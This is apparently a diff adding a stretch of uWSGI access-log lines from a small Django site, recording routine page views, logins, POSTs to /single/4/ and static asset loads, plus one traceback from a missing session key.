+[pid: 15176|app: 0|req: 2374/3203] 180.160.48.43 () {40 vars in 884 bytes} [Thu Jan 14 13:03:09 2021] GET /single/4/ => generated 10499 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2375/3204] 180.160.48.43 () {40 vars in 862 bytes} [Thu Jan 14 13:03:11 2021] GET /single/4/ => generated 10499 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2376/3205] 180.160.48.43 () {48 vars in 1063 bytes} [Thu Jan 14 13:03:20 2021] POST /single/4/ => generated 0 bytes in 21 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2377/3206] 180.160.48.43 () {42 vars in 913 bytes} [Thu Jan 14 13:03:20 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2378/3207] 180.160.48.43 () {42 vars in 915 bytes} [Thu Jan 14 13:03:20 2021] GET /single/4/ => generated 11041 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2379/3208] 219.228.146.135 () {48 vars in 1104 bytes} [Thu Jan 14 13:03:30 2021] POST /single/4/ => generated 0 bytes in 24 msecs (HTTP/1.1 302) 7 headers in 202 bytes (4 switches on core 1)
+[pid: 15176|app: 0|req: 2380/3209] 219.228.146.135 () {42 vars in 953 bytes} [Thu Jan 14 13:03:30 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2381/3210] 219.228.146.135 () {42 vars in 955 bytes} [Thu Jan 14 13:03:30 2021] GET /single/4/ => generated 11561 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 15176|app: -1|req: -1/3211] 219.228.146.135 () {38 vars in 844 bytes} [Thu Jan 14 13:03:30 2021] GET /static/img/r_photo/14_OIP.jpg => generated 9197 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 15176|app: 0|req: 2382/3212] 219.228.146.135 () {48 vars in 1018 bytes} [Thu Jan 14 13:03:38 2021] POST /single/4/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2383/3213] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 13:03:38 2021] GET /single/4/ => generated 11027 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2384/3214] 219.228.146.135 () {48 vars in 1104 bytes} [Thu Jan 14 13:04:05 2021] POST /single/4/ => generated 0 bytes in 24 msecs (HTTP/1.1 302) 7 headers in 202 bytes (3 switches on core 1)
+[pid: 15176|app: 0|req: 2385/3215] 219.228.146.135 () {42 vars in 953 bytes} [Thu Jan 14 13:04:05 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2386/3216] 219.228.146.135 () {42 vars in 955 bytes} [Thu Jan 14 13:04:05 2021] GET /single/4/ => generated 11561 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 15176|app: -1|req: -1/3217] 219.228.146.135 () {40 vars in 907 bytes} [Thu Jan 14 13:04:05 2021] GET /static/img/r_photo/8_seeseeme.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 15176|app: -1|req: -1/3218] 219.228.146.135 () {38 vars in 844 bytes} [Thu Jan 14 13:04:05 2021] GET /static/img/r_photo/15_OIP.jpg => generated 9197 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 15176|app: 0|req: 2387/3219] 219.228.146.135 () {48 vars in 1018 bytes} [Thu Jan 14 13:04:14 2021] POST /single/4/ => generated 27 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2388/3220] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 13:04:14 2021] GET /single/4/ => generated 11007 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 15176|app: -1|req: -1/3221] 219.228.146.135 () {40 vars in 899 bytes} [Thu Jan 14 13:04:14 2021] GET /static/img/r_photo/15_OIP.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 15176|app: 0|req: 2389/3222] 180.160.48.43 () {40 vars in 849 bytes} [Thu Jan 14 13:05:51 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2390/3223] 180.160.48.43 () {48 vars in 958 bytes} [Thu Jan 14 13:06:02 2021] POST /login/ => generated 27 bytes in 113 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2391/3224] 180.160.48.43 () {40 vars in 873 bytes} [Thu Jan 14 13:06:02 2021] GET /home/ => generated 10465 bytes in 33 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2392/3225] 180.160.48.43 () {40 vars in 880 bytes} [Thu Jan 14 13:06:06 2021] GET /single/4/ => generated 11009 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 15176|app: -1|req: -1/3226] 180.160.48.43 () {38 vars in 804 bytes} [Thu Jan 14 13:06:06 2021] GET /static/img/r_photo/15_OIP.jpg => generated 9197 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 15176|app: 0|req: 2393/3227] 180.160.48.43 () {48 vars in 967 bytes} [Thu Jan 14 13:06:15 2021] POST /single/4/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2394/3228] 180.160.48.43 () {40 vars in 884 bytes} [Thu Jan 14 13:06:15 2021] GET /single/4/ => generated 10470 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2395/3229] 180.160.48.43 () {48 vars in 1063 bytes} [Thu Jan 14 13:06:25 2021] POST /single/4/ => generated 0 bytes in 22 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2396/3230] 180.160.48.43 () {42 vars in 913 bytes} [Thu Jan 14 13:06:25 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2397/3231] 180.160.48.43 () {42 vars in 915 bytes} [Thu Jan 14 13:06:26 2021] GET /single/4/ => generated 10994 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 15176|app: -1|req: -1/3232] 180.160.48.43 () {40 vars in 859 bytes} [Thu Jan 14 13:06:26 2021] GET /static/img/r_photo/15_OIP.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 15176|app: 0|req: 2398/3233] 223.104.210.73 () {36 vars in 687 bytes} [Thu Jan 14 13:06:27 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2399/3234] 223.104.210.73 () {36 vars in 689 bytes} [Thu Jan 14 13:06:27 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 15176|app: -1|req: -1/3235] 223.104.210.73 () {38 vars in 806 bytes} [Thu Jan 14 13:06:27 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3236] 223.104.210.73 () {38 vars in 784 bytes} [Thu Jan 14 13:06:27 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3237] 223.104.210.73 () {38 vars in 786 bytes} [Thu Jan 14 13:06:27 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3238] 223.104.210.73 () {38 vars in 788 bytes} [Thu Jan 14 13:06:27 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3239] 223.104.210.73 () {38 vars in 792 bytes} [Thu Jan 14 13:06:27 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3240] 223.104.210.73 () {38 vars in 767 bytes} [Thu Jan 14 13:06:27 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3241] 223.104.210.73 () {38 vars in 765 bytes} [Thu Jan 14 13:06:27 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3242] 223.104.210.73 () {38 vars in 783 bytes} [Thu Jan 14 13:06:28 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3243] 223.104.210.73 () {38 vars in 781 bytes} [Thu Jan 14 13:06:28 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3244] 223.104.210.73 () {38 vars in 773 bytes} [Thu Jan 14 13:06:29 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3245] 223.104.210.73 () {38 vars in 838 bytes} [Thu Jan 14 13:06:30 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 15176|app: 0|req: 2400/3246] 223.104.210.73 () {48 vars in 983 bytes} [Thu Jan 14 13:06:39 2021] POST /login/ => generated 27 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2401/3247] 223.104.210.73 () {40 vars in 868 bytes} [Thu Jan 14 13:06:39 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2402/3248] 223.104.210.73 () {40 vars in 870 bytes} [Thu Jan 14 13:06:40 2021] GET /home/ => generated 10463 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1)
+[pid: 15176|app: -1|req: -1/3249] 223.104.210.73 () {38 vars in 897 bytes} [Thu Jan 14 13:06:40 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 14933 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3250] 223.104.210.73 () {38 vars in 891 bytes} [Thu Jan 14 13:06:40 2021] GET /static/img/t_photo/4_math.png => generated 587232 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 15176|app: 0|req: 2403/3251] 223.104.210.73 () {40 vars in 875 bytes} [Thu Jan 14 13:06:42 2021] GET /single/2 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2404/3252] 223.104.210.73 () {40 vars in 877 bytes} [Thu Jan 14 13:06:43 2021] GET /single/2/ => generated 9514 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 15176|app: -1|req: -1/3253] 223.104.210.73 () {38 vars in 826 bytes} [Thu Jan 14 13:06:43 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 15176|app: -1|req: -1/3254] 223.104.210.73 () {38 vars in 828 bytes} [Thu Jan 14 13:06:43 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 15176|app: 0|req: 2405/3255] 223.104.210.73 () {40 vars in 891 bytes} [Thu Jan 14 13:06:56 2021] GET /home/single.html => generated 10463 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2406/3256] 223.104.210.73 () {40 vars in 886 bytes} [Thu Jan 14 13:06:59 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2407/3257] 223.104.210.73 () {40 vars in 888 bytes} [Thu Jan 14 13:06:59 2021] GET /single/4/ => generated 10878 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 15176|app: -1|req: -1/3258] 223.104.210.73 () {38 vars in 895 bytes} [Thu Jan 14 13:06:59 2021] GET /static/img/t_photo/hungry.png => generated 1713 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 15176|app: -1|req: -1/3259] 223.104.210.73 () {38 vars in 895 bytes} [Thu Jan 14 13:06:59 2021] GET /static/img/r_photo/15_OIP.jpg => generated 9197 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 15176|app: 0|req: 2408/3260] 223.104.210.73 () {46 vars in 1032 bytes} [Thu Jan 14 13:09:29 2021] POST /single/4/ => generated 0 bytes in 507 msecs (HTTP/1.1 302) 7 headers in 202 bytes (41 switches on core 1)
+[pid: 15176|app: 0|req: 2409/3261] 223.104.210.73 () {42 vars in 921 bytes} [Thu Jan 14 13:09:30 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2410/3262] 223.104.210.73 () {42 vars in 923 bytes} [Thu Jan 14 13:09:30 2021] GET /single/4/ => generated 11383 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 15176|app: -1|req: -1/3263] 223.104.210.73 () {40 vars in 950 bytes} [Thu Jan 14 13:09:30 2021] GET /static/img/r_photo/15_OIP.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 15176|app: -1|req: -1/3264] 223.104.210.73 () {38 vars in 961 bytes} [Thu Jan 14 13:09:30 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 540541 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 15176|app: 0|req: 2411/3265] 180.160.48.43 () {40 vars in 862 bytes} [Thu Jan 14 13:09:32 2021] GET /single/4/ => generated 11537 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 15176|app: -1|req: -1/3266] 180.160.48.43 () {40 vars in 859 bytes} [Thu Jan 14 13:09:32 2021] GET /static/img/r_photo/15_OIP.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3267] 180.160.48.43 () {38 vars in 870 bytes} [Thu Jan 14 13:09:32 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 540541 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 15176|app: 0|req: 2412/3268] 223.104.210.73 () {46 vars in 1029 bytes} [Thu Jan 14 13:09:50 2021] POST /single/4/ => generated 0 bytes in 24 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2413/3269] 223.104.210.73 () {42 vars in 921 bytes} [Thu Jan 14 13:09:50 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2414/3270] 223.104.210.73 () {42 vars in 923 bytes} [Thu Jan 14 13:09:50 2021] GET /single/4/ => generated 11867 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 15176|app: -1|req: -1/3271] 223.104.210.73 () {40 vars in 1016 bytes} [Thu Jan 14 13:09:50 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 15176|app: 0|req: 2415/3272] 180.160.48.43 () {48 vars in 1063 bytes} [Thu Jan 14 13:09:57 2021] POST /single/4/ => generated 0 bytes in 22 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2416/3273] 180.160.48.43 () {42 vars in 913 bytes} [Thu Jan 14 13:09:57 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2417/3274] 180.160.48.43 () {42 vars in 915 bytes} [Thu Jan 14 13:09:57 2021] GET /single/4/ => generated 12574 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 15176|app: -1|req: -1/3275] 180.160.48.43 () {40 vars in 925 bytes} [Thu Jan 14 13:09:57 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 15176|app: 0|req: 2418/3276] 223.104.210.73 () {48 vars in 1036 bytes} [Thu Jan 14 13:10:20 2021] POST /single/4/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 6 headers in 179 bytes (2 switches on core 0)
+[pid: 15176|app: 0|req: 2419/3277] 223.104.210.73 () {40 vars in 881 bytes} [Thu Jan 14 13:10:20 2021] GET /single/4/ => generated 11860 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 15176|app: -1|req: -1/3278] 223.104.210.73 () {40 vars in 950 bytes} [Thu Jan 14 13:10:20 2021] GET /static/img/r_photo/15_OIP.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3279] 223.104.210.73 () {40 vars in 1016 bytes} [Thu Jan 14 13:10:20 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 15176|app: 0|req: 2420/3280] 223.104.210.73 () {48 vars in 1036 bytes} [Thu Jan 14 13:12:06 2021] POST /single/4/ => generated 27 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2421/3281] 223.104.210.73 () {40 vars in 881 bytes} [Thu Jan 14 13:12:06 2021] GET /single/4/ => generated 11364 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 15176|app: -1|req: -1/3282] 223.104.210.73 () {40 vars in 1016 bytes} [Thu Jan 14 13:12:06 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 15176|app: 0|req: 2422/3283] 180.160.48.43 () {48 vars in 1064 bytes} [Thu Jan 14 13:13:04 2021] POST /single/4/ => generated 0 bytes in 57 msecs (HTTP/1.1 302) 7 headers in 202 bytes (3 switches on core 0)
+[pid: 15176|app: 0|req: 2423/3284] 180.160.48.43 () {42 vars in 912 bytes} [Thu Jan 14 13:13:04 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2424/3285] 180.160.48.43 () {42 vars in 914 bytes} [Thu Jan 14 13:13:04 2021] GET /single/4/ => generated 12034 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 15176|app: -1|req: -1/3286] 180.160.48.43 () {40 vars in 924 bytes} [Thu Jan 14 13:13:04 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3287] 180.160.48.43 () {38 vars in 805 bytes} [Thu Jan 14 13:13:04 2021] GET /static/img/r_photo/20_love.jpg => generated 15609 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 15176|app: 0|req: 2425/3288] 180.160.48.43 () {48 vars in 1064 bytes} [Thu Jan 14 13:13:12 2021] POST /single/4/ => generated 0 bytes in 45 msecs (HTTP/1.1 302) 7 headers in 202 bytes (3 switches on core 0)
+[pid: 15176|app: 0|req: 2426/3289] 180.160.48.43 () {42 vars in 912 bytes} [Thu Jan 14 13:13:12 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2427/3290] 180.160.48.43 () {42 vars in 914 bytes} [Thu Jan 14 13:13:12 2021] GET /single/4/ => generated 12550 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 15176|app: -1|req: -1/3291] 180.160.48.43 () {40 vars in 860 bytes} [Thu Jan 14 13:13:12 2021] GET /static/img/r_photo/20_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3292] 180.160.48.43 () {38 vars in 805 bytes} [Thu Jan 14 13:13:12 2021] GET /static/img/r_photo/21_love.jpg => generated 15609 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 15176|app: 0|req: 2428/3293] 219.228.146.135 () {42 vars in 955 bytes} [Thu Jan 14 13:13:55 2021] GET /single/4/ => generated 12548 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 15176|app: -1|req: -1/3294] 219.228.146.135 () {40 vars in 899 bytes} [Thu Jan 14 13:13:55 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 15176|app: -1|req: -1/3295] 219.228.146.135 () {38 vars in 910 bytes} [Thu Jan 14 13:13:55 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 540541 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 15176|app: -1|req: -1/3296] 219.228.146.135 () {38 vars in 846 bytes} [Thu Jan 14 13:13:55 2021] GET /static/img/r_photo/20_love.jpg => generated 15609 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 15176|app: -1|req: -1/3297] 219.228.146.135 () {38 vars in 846 bytes} [Thu Jan 14 13:13:55 2021] GET /static/img/r_photo/21_love.jpg => generated 15609 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 15176|app: -1|req: -1/3298] 219.228.146.135 () {42 vars in 883 bytes} [Thu Jan 14 13:13:59 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 15176|app: 0|req: 2429/3299] 180.160.48.43 () {48 vars in 967 bytes} [Thu Jan 14 13:14:33 2021] POST /single/4/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2430/3300] 180.160.48.43 () {40 vars in 884 bytes} [Thu Jan 14 13:14:33 2021] GET /single/4/ => generated 12034 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 15176|app: -1|req: -1/3301] 180.160.48.43 () {40 vars in 925 bytes} [Thu Jan 14 13:14:33 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 15176|app: -1|req: -1/3302] 180.160.48.43 () {40 vars in 861 bytes} [Thu Jan 14 13:14:33 2021] GET /static/img/r_photo/20_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 15176|app: 0|req: 2431/3303] 183.192.164.71 () {32 vars in 564 bytes} [Thu Jan 14 13:14:58 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1)
+Internal Server Error: /home/single.html
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 38, in home
+ response['uid'] = request.session['uid']
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__
+ return self._session[key]
+KeyError: 'uid'
+[pid: 15176|app: 0|req: 2432/3304] 120.204.17.71 () {32 vars in 583 bytes} [Thu Jan 14 13:15:20 2021] GET /home/single.html => generated 60419 bytes in 50 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2433/3305] 120.204.17.72 () {32 vars in 567 bytes} [Thu Jan 14 13:15:50 2021] GET /single/2 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2434/3306] 219.228.146.135 () {48 vars in 1103 bytes} [Thu Jan 14 13:18:57 2021] POST /single/4/ => generated 0 bytes in 28 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2435/3307] 219.228.146.135 () {42 vars in 953 bytes} [Thu Jan 14 13:18:57 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2436/3308] 219.228.146.135 () {42 vars in 955 bytes} [Thu Jan 14 13:18:57 2021] GET /single/4/ => generated 12521 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 15176|app: -1|req: -1/3309] 219.228.146.135 () {40 vars in 965 bytes} [Thu Jan 14 13:18:58 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3310] 219.228.146.135 () {40 vars in 901 bytes} [Thu Jan 14 13:18:58 2021] GET /static/img/r_photo/20_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 15176|app: 0|req: 2437/3311] 219.228.146.135 () {42 vars in 955 bytes} [Thu Jan 14 13:19:08 2021] GET /single/4/ => generated 12521 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 15176|app: -1|req: -1/3312] 219.228.146.135 () {42 vars in 883 bytes} [Thu Jan 14 13:19:08 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 15176|app: 0|req: 2438/3313] 219.228.146.135 () {48 vars in 1103 bytes} [Thu Jan 14 13:19:14 2021] POST /single/4/ => generated 0 bytes in 19 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 1)
